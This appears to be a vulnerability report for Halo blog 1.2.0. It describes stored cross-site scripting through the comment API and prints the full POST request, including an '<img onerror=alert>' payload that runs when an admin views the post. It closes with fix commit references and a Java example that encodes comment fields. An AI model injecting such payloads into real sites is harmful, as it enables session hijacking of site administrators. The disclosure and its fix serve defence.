Environment
Server Version: 1.2.0
Admin Version: 1.2.0
DataBase: H2
Vulnerability details
Halo blog allows users to submit comments on blog posts. The application receives data from an untrusted source and does not filter it.
step1: submit comment
The post packet is as follows:
```http
POST /api/content/posts/comments HTTP/1.1
Host: 192.168.0.104:8090
Content-Length: 132
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.0.104:8090
Referer: http://192.168.0.104:8090/archives/hello-halo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}
```
step2: view the blog post
After this comment has been submitted, an admin visits the blog post. The script supplied by the attacker will then execute in the victim user's browser.
code: src/main/java/run/halo/app/controller/content/api/PostController.java
Related: #127
Thanks for your exploration and suggestions.
fix: halo-dev#547
6cdb15d
fix: #547 (#677)
d6b3d6c
fix: halo-dev#547 (halo-dev#677)
e5ca012
JohnNiang
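One way to neutralise the comment fields from the reported request, as an added example that is not Halo's code and not the fix from the linked commits: it assumes the values are written into HTML text or quoted attributes, and the class and method names (`CommentFieldEncoder`, `escapeHtml`, `safeUrl`) are hypothetical.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.LinkedHashMap;
import java.util.Map;

// Added example (hypothetical names, JDK only): encode comment fields for HTML output.
public class CommentFieldEncoder {

    // Encode the characters that let text leave an HTML text node or a quoted attribute.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Allow only absolute http(s) links for authorUrl; anything else becomes empty.
    static String safeUrl(String url) {
        try {
            URI u = new URI(url.trim());
            String scheme = u.getScheme();
            boolean web = "http".equalsIgnoreCase(scheme) || "https".equalsIgnoreCase(scheme);
            if (web && u.getHost() != null) {
                return escapeHtml(u.toString());
            }
        } catch (URISyntaxException e) {
            // malformed URL: fall through and drop it
        }
        return "";
    }

    public static void main(String[] args) {
        // Field values copied from the request in the report.
        Map<String, String> comment = new LinkedHashMap<>();
        comment.put("author", escapeHtml("guest1"));
        comment.put("authorUrl", safeUrl("http://test.com"));
        comment.put("content", escapeHtml("<img src=1 onerror=alert(/test/)>"));
        comment.forEach((k, v) -> System.out.println(k + " = " + v));
        // Constructed input: a non-http(s) scheme is rejected by the allow-list.
        System.out.println("rejected -> [" + safeUrl("javascript:void(0)") + "]");
    }
}
```

Apply the encoding once, at the point where the value is written into HTML; encoding on save and again on render double-encodes the text.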